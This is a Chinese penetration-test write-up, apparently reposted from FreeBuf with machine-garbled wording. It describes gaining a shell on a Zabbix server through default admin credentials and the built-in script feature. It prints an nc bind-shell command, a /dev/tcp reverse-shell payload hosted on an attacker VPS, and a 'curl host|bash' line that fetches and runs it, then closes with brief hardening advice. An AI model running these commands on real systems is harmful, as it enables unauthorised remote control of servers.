快捷搜索:  网络  后门  扫描  渗透  CVE  木马  黑客  as

记一次渗透排泄测试过程中的Zabbix命令执行行使

Zabbix是一个基于WEB界面的提供分布式体系监视和收集监视功能的企业级的开源解决方案。治理员在装置设置Zabbix过程中,使用了弱口令或默认的用户名与口令(Admin/zabbix),如许,Zabbix服务器的用户认证就形同虚设。攻击者可以创建“system.run[co妹妹and,]”监控项执行命令,甚至获取服务器shell,进行种种挖矿举动。

测试过程

下面是获取Zabbix Admin口令的情形下,怎么样获取服务器shell的过程。

1. 在“治理–>脚本”页面中创建一个script,以下图:

1.png

“执行在”选择Zabbix 服务器,“命令”里输入:

mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 12345 > /tmp/tmp_fifo

意思是用nc在12345端口上绑定一个反弹shell。

2. 在“监测中–>问题”此界面点击一台服务器,随即会弹出一个“脚本”选项卡,点击上面创建的”nc shell”。

1.png

如许上面的命令就会被执行。然则,由于选择的这台服务器没有装置nc,导致命令执行不成功。既然没有装置nc,那就给这台服务器装置nc呗!

1.png

3.创建一个脚本,在命令里输入“yum –y install nc”,装置nc。

1.png

4.执行步骤3之中的脚本失败,显示需要root权限才能执行。

1.png

到这步,行使nc确立正向连接的shell是没戏了。

5.这时辰,在“设置–>主机”界面可以看到Zabbix服务器监控着Linux平台的服务器。

1.png

6.此时头脑归想着Linux服务器get shell的要领。既然能够命令执行,那我们是否是可以在一台服务器上开放一个特定的端口,组织好反弹shell的代码,只需有客户端连接此端口,网络黑客,那么客户端的shell就会反弹到我们那台服务器上。

7.OK,那按照上面思路先在一个VPS上搭建一个Web服务器,在网站根目录下创建一个index.html,内容以下:

sh -i >& /dev/tcp/52.**.***.78/12345 0>&1

意思是与52..*.78这台服务器的12345端口确立tcp连接,并将本人的shell反弹到此服务器。

8.在52..*.78这台服务器监听12345端口。

1.png

9.然后在Zabbix服务器上创建一个脚本,用于反弹shell的确立。

1.png

在命令里输入“curl 52..*.78|bash”。

执行上面的脚本

1.png

10.反弹shell确立成功。

1.png

zabbix安全加固

下面说一下怎么样对zabbix安全加固,防止这类情形发生:

一、很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令;

2、zabbix的server以及agent都不要以root启动,不要配置AllowRoot=1;

三、禁止agent执行system.run,不要配置EnableRemoteCo妹妹ands=1。

* itlance_ouyang,转载注明来自FreeBuf.com

您可能还会对下面的文章感兴趣: